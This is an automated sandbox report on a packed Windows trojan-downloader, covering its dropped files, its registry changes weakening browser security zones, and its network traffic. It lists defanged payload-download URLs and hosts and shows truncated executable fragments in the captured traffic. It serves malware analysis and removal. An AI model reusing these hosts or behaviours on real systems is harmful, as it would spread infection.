HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 93b111c1a0a31e76b5729574bbdece6d
SHA1: 8c16e05b80405092310ee78d4e0d9dbdf39f3dbf
SHA256: 4da272d4d9de237b32daf9a6a234c69c1874d027e346d699a31192798d500eac
SSDeep: 12288:8XjMVYN6X4sWlRig2J7ClvZxVLvUoyUoKQt5ynmePVvO/xwV15:8Xu06XJMz GlL99yU 3ccM
Size: 723968 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-29 23:29:30
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
setup_30004.exe:2012
syunbo_53_1248.exe:1300
The Trojan injects its code into the following process(es):
%original file name%.exe:400
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process setup_30004.exe:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\anote\Alarm.wav (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\nsisdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (35241 bytes)
%Program Files%\anote\uninstall.exe (2392 bytes)
%Program Files%\anote\anote.dat (286 bytes)
%Program Files%\anote\Language\chinese.ini (2 bytes)
%Documents and Settings%\%current user%\Desktop\¶à²Ê±ãÇ©.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\öÃâ€ÂØ.lnk (1 bytes)
%Program Files%\anote\cfg.ini (124 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\¶à²Ê±ãÇ©.lnk (1 bytes)
%Program Files%\anote\anote.exe (36078 bytes)
%Program Files%\anote\about.jpg (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\System.dll (11 bytes)
%Program Files%\anote\anote.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (243 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\°ïÖú.lnk (286 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsuD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\nsisdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (0 bytes)
The process %original file name%.exe:400 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\syunbo_53_1248.exe (6396 bytes)
The process syunbo_53_1248.exe:1300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\dBwBAAAAAAAA (207286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\psb[1].gif (383250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_30004[1].exe (81171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\setup_30004.exe (34350 bytes)
Registry activity
The process setup_30004.exe:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\anote]
"anote" = "noteupdateservice"
"fixid" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"NoModify" = "1"
[HKCR\Applications\anote.exe]
"NoStartPage" = ""
[HKLM\SOFTWARE\anote]
"Names" = "noteupdateservice"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"InstallDate" = "20140812"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\anote\data]
"runtime" = "65000"
"LastVersion" = "1.35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\anote]
"Version" = "1.35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCR\CLSID\{F481F745-5C57-4f71-95B4-78546706C7A9}]
"QI" = "000C29AC63984C23B2F35C8C20B50EF2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"UninstallString" = "%Program Files%\anote\uninstall.exe _?=%Program Files%\anote"
[HKLM\SOFTWARE\anote]
"IconIndex" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"DisplayIcon" = "%Program Files%\anote\uninstall.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"DisplayName" = "anote (v1.35)"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 BB FA A7 8B 50 D5 ED 3E B0 BE F5 5C 21 DD A9"
[HKLM\SOFTWARE\anote]
"Count" = "1"
"instname" = "setup_30004.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\anote\data]
"rdata" = "bgQOVG8eWhYLCGQZGUQRVx5RC1YLB3F4S31vaQsYaBIuHX9AbWdrTxFpHW8IHQg5dHw8f2JpBVsnUQROVCthEHZPEx8XAgMZWUpxCBkKOhpeG29BXRpZQWMREEsWH01PXk9YHnZdVUg6RFtKMVw1X00Xe1VECk5EQ15eBX4DMFUVST5Y"
[HKLM\SOFTWARE\anote]
"(Default)" = "%Program Files%\anote"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"NoRepair" = "1"
[HKLM\SOFTWARE\anote]
"Options" = "1"
[HKCR\Applications\Uninstall.exe]
"NoStartPage" = ""
[HKLM\SOFTWARE\anote]
"InstallTime" = "2015812"
The process %original file name%.exe:400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 24 3F 05 4E D1 D5 F0 64 98 36 23 7E 5C 56 F8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process syunbo_53_1248.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%]
"setup_30004.exe" = "Muti Color Note"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 7C 66 57 A6 02 CE 62 54 4D FE B9 4B D0 2A 48"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 272edafd76205919cd3f5218cd14d247 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_30004[1].exe |
| bfbe9995a89f75b55fdc9b756a41cbb7 | c:\Program Files\anote\anote.dll |
| 44fc98f03e2270629e9f9b19d6200588 | c:\Program Files\anote\anote.exe |
| 8eb8239f10f026307a10c9c3a71c5106 | c:\Program Files\anote\uninstall.exe |
| 272edafd76205919cd3f5218cd14d247 | c:\Program Files\setup_30004.exe |
| 1a1f4c4066d1d49db10b2b273b4efd9c | c:\syunbo_53_1248.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
setup_30004.exe:2012
syunbo_53_1248.exe:1300 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\anote\Alarm.wav (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\nsisdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (35241 bytes)
%Program Files%\anote\uninstall.exe (2392 bytes)
%Program Files%\anote\anote.dat (286 bytes)
%Program Files%\anote\Language\chinese.ini (2 bytes)
%Documents and Settings%\%current user%\Desktop\¶à²Ê±ãÇ©.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\öÃâ€ÂØ.lnk (1 bytes)
%Program Files%\anote\cfg.ini (124 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\¶à²Ê±ãÇ©.lnk (1 bytes)
%Program Files%\anote\anote.exe (36078 bytes)
%Program Files%\anote\about.jpg (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\System.dll (11 bytes)
%Program Files%\anote\anote.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (243 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\°ïÖú.lnk (286 bytes)
C:\syunbo_53_1248.exe (6396 bytes)
%Program Files%\dBwBAAAAAAAA (207286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\psb[1].gif (383250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_30004[1].exe (81171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\setup_30004.exe (34350 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)
Company Name: Product Name: ?????Product Version: 1.0.0.0Legal Copyright: ?????? ????????Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: ?????Comments: ??????????(http://www.eyuyan.com)Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 671744 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 675840 | 524288 | 521728 | 5.37025 | f2a991e53cdcbbcb9355c64f56504a1f |
| .rsrc | 1200128 | 204800 | 201216 | 4.47958 | 00414c43d8e228c2c17539fdd4adb18f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://d.juezhao123.com/setup/setup_30004.exe | 58.222.24.189 |
| hxxp://www.jiuhuabuy.com/kuplay/930/871248/ | 121.43.68.2 |
| hxxp://120.55.137.126/1439353161-930-871248/ | |
| hxxp://rawtj.photo.store.qq.com/psb?/V11ocPuK4Lde3Q/o1lxhiN1xUeN16I9G2IBO1NuWCYmmN8D3gGbpJxI0bE!/r/dBwBAAAAAAAA | 123.151.71.111 |
| hxxp://image.juezhao123.com/img/30004.jpg?t=1930351 | 58.222.20.238 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /img/30004.jpg?t=1930351 HTTP/1.0
Host: image.juezhao123.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Wed, 12 Aug 2015 04:15:56 GMT
Content-Type: image/jpeg
Content-Length: 243
Last-Modified: Sat, 08 Aug 2015 04:10:03 GMT
Connection: close
Accept-Ranges: bytes
[Settings]..iconindex=1..pos=..width=550..height=400..border=10..tooltip=0..titleheight=50..trayiconindex=0..showstatus=0..transparent=10%..newwidth=0..newheight=0..anote=100..noteupdateservice=1..menucolor=2..sand=65000..float=1..order=desc....
GET /psb?/V11ocPuK4Lde3Q/o1lxhiN1xUeN16I9G2IBO1NuWCYmmN8D3gGbpJxI0bE!/r/dBwBAAAAAAAA HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: rawtj.photo.store.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=94608000
Content-Length: 12293787
Content-Type: image/gif
Expires: Mon, 5 Dec 2050 07:25:14 GMT
Last-Modified: Mon, 18 Dec 2006 07:25:14 GMT
Server: httpserver
GIF87a....w..,............................................6.)6$..). $!.0, ..O..a.*O.%f!.M%.r*1P3 n9L26883.../.9Jx:YMXiuSetup_20031123828....i...R9...=v....LzZNqsc\Z`^alnVips*..8/.;M.<g.K5.L:.FI.LC.CU.EX.WF.XH.TT.Gh.Mb.Jv.Ve.Wi.Xw.\q.]p.iN.sW.dj.fl.gx.lw.va.|g.w{.s|.fw._{.jw.n.0x.4W.XV.ni.Sh.m}.Qv.qV..u..w..v..p..o....[.,d..X..g.&_.-r.U..Z$.j..g,.zy.Hy.dC.._..s.)x..u.U..T0.q..p'.\.._&.t..s$.D..hI.|i.8..]..n..m..T..n..u..y..|.....3.....,..M..W..h..s..K..S..q...?..:..T..{..T..s..<..[..L..q..X..... .....6.....)........K..m..N..n..O..i..L..o...../..;..N..r..n..L..q..............................................................................................................................................................................................................................p.D.......... :.*\......#J.H.....3j...... C..I......t@.....*Q.......8s&..$..xL........H.*].....P.J.J....X.j......`.~.FT.4eh..5...Y.f.....X..f..#*........L......* .....E.:...(.b.8p.J.o...C..M....F..F..i..H[{V*.....g..........].T].......n.....)........k........F....|.....Nj........O.........oy.s..%.jJ]..e.aw...6...X...Y..../.T._zM.E.....\...E^d..X".....jH..W....".8.x..$.(....)..~.&!m.E.a=]..N2':......./...Lc2.......bQJD.W0...fQ^ ...g.R..e...1..I..|......V^4?YX.x@.5%v.y.....B.4.| .A(Ea...Jc./.x.....j.Y...*..pp.QQ..B./Ep:D.Q...Q;4.E.J01.."F.......:.8Z.1......Vk-SG".N1..SO<....zK}.i....Dd ....<.E..E)...C.Zj.f......)..y&.L.....2l...1.. ...4....@......o.^.....^..J.FA\......,...-.......l.v3FQ.Y...._..Q..;.a..FD.N.#.(&e......Jsq.Z..EQ*
<<< skipped >>>
GET /kuplay/930/871248/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.jiuhuabuy.com
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Date: Wed, 12 Aug 2015 04:19:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
location: hXXp://120.55.137.126/1439353161-930-871248/
0..HTTP/1.1 302 Moved Temporarily..Date: Wed, 12 Aug 2015 04:19:22 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.2.17..location: hXXp://120.55.137.126/1439353161-930-871248/..0..
GET /1439353161-930-871248/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 120.55.137.126
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 12 Aug 2015 04:19:26 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Disposition: attachment; filename=bobolicjlhgabdh.exe
Set-Cookie: route=;Path=/
HTTP/1.1 200 OK..Date: Wed, 12 Aug 2015 04:19:26 GMT..Content-Type: application/octet-stream..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.2.17..Content-Disposition: attachment; filename=bobolicjlhgabdh.exe..Set-Cookie: route=;Path=/..5a8..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L.....*J.................Z...........0.......p....@..........................................................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u...
<<< skipped >>>
GET /setup/setup_30004.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.juezhao123.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 12 Aug 2015 12:08:14 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sat, 08 Aug 2015 12:04:05 GMT
ETag: "409d8-9da10-51ccb8c913a21"
Accept-Ranges: bytes
Content-Length: 645648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................\...........2.......p....@..........................................................................s...........'..............h'...........................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc....'.......(...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....6B..H.P.u..u..u....r@..B...SV.5.6B..E.WP.u....r@..e...E..E.P.u....r@..}..e....Lp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Tp@..E...E.P.E.P.u....r@..u....E..9}...w....~X.te.v4..Dp@....E.tU.}.j.W.E......E.......@p@..vXW..Hp@..u..5<p@.W...E..E.h ...Pj.h..B.W...r@..u.W...u....E.P.u...\r@._^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_400:
`.rsrc
`.rsrc
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
hXXp://xiazai.lianmengqudao1.com:1227/down/u.php?d=yunbo_53_1248.exe
hXXp://xiazai.lianmengqudao1.com:1227/down/u.php?d=yunbo_53_1248.exe
C:\syunbo_53_1248.exe
C:\syunbo_53_1248.exe
hXXp://VVV.jiuhuabuy.com/kuplay/930/871248/
hXXp://VVV.jiuhuabuy.com/kuplay/930/871248/
C:\jufilo_930_871248.exe
C:\jufilo_930_871248.exe
#ÿf
#ÿf
H.Xli
H.Xli
\v.rFc
\v.rFc
!2.mf
!2.mf
;:t%s
;:t%s
Â`pI
Â`pI
f
f
